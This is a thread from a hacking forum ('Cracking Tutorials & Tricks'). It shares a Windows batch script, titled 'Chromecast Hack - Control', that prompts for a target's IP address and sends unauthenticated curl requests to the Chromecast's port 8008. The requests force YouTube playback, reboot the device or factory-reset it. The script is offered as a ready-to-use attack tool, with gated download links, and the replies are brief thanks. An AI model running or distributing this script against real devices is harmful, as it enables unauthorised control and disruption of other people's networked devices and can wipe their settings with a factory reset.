1. Check Out Our Vip review >>> Click here

    Dismiss Notice
  2. If you're wondering why you can't reply to threads, see this thread >>> Click Here

    Dismiss Notice

Chromecast Hack - Control + curl [Research]

Discussion in 'Cracking Tutorials & Tricks' started by kyois, Jan 8, 2019.

  1. kyois

    kyois Active Member

    Joined:
    Apr 25, 2017
    Messages:
    791
    Likes Received:
    329
    Trophy Points:
    63
    Code:
    @title Chromecast Hack - Control
    @echo off
    :start
    echo ...................................................
    echo .       Chromecast Hack - Control                 .
    echo ...................................................
    set /p ip=" IP Address : "
    set /p id=" Youtube Video ID : "
    cls
    echo ...................................................
    echo .       Chromecast Hack - Control                 .
    echo ...................................................
    echo 1 - Play a Video
    echo 2 - Reboot
    echo 3 - Factory Reset
    set /p choice=Choose a option :
    if '%choice%'=='1' goto 1
    if '%choice%'=='2' goto 2
    if '%choice%'=='3' goto 3
    cls
    goto start
    :1
    curl.exe -H "content-Type: application/json" http://%ip%:8008/apps/YouTube -X POST -d 'v=%id%'
    echo Video %id% send to %ip%
    pause
    cls
    goto start
    :2
    curl.exe -H "content-Type: application/json" http://%ip%:8008/setup/reboot -X POST -d '{ "params": "now" }'
    pause
    cls
    goto start
    :3
    curl.exe -H "content-Type: application/json" http://%ip%:8008/setup/reboot -X POST -d '{ "params": "fdr" }'
    pause
    cls
    goto start
    
    Download: Chromecast Hack Control + curl.exe
    Hidden Content:
    You must reply before you can see the hidden data contained here.
    Download 2: Chromecast Hack Control + curl.exe
    Hidden Content:
    You must reply before you can see the hidden data contained here.
    Virus Scan:
    Hidden Content:
    You must reply before you can see the hidden data contained here.
     
    n0symp4thy, Dipset420 and zebrawild like this.
  2. aiamerda

    aiamerda Active Member

    Joined:
    May 27, 2018
    Messages:
    2,265
    Likes Received:
    17,146
    Trophy Points:
    113
    Occupation:
    Unavailable
  3. zebrawild

    zebrawild Member

    Joined:
    Jul 19, 2018
    Messages:
    74
    Likes Received:
    0
    Trophy Points:
    6
    Gender:
    Male
    Occupation:
    none
    Location:
    india
    excellent bravo
     
  4. Ereu

    Ereu New Member

    Joined:
    Jul 23, 2020
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    Good
     
  5. Dipset420

    Dipset420 Active Member

    Joined:
    Jun 12, 2019
    Messages:
    272
    Likes Received:
    5
    Trophy Points:
    18
    Gender:
    Male
  6. Six

    Six New Member

    Joined:
    Sep 6, 2021
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
     
  7. Six

    Six New Member

    Joined:
    Sep 6, 2021
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    Dead links
     
  8. ironhead666

    ironhead666 New Member

    Joined:
    Aug 6, 2022
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Gender:
    Male
    t
    thank you
     
  9. n0symp4thy

    n0symp4thy New Member

    Joined:
    Jun 6, 2022
    Messages:
    7
    Likes Received:
    0
    Trophy Points:
    1
    Gender:
    Male
    Thanks will try
     

Share This Page

Share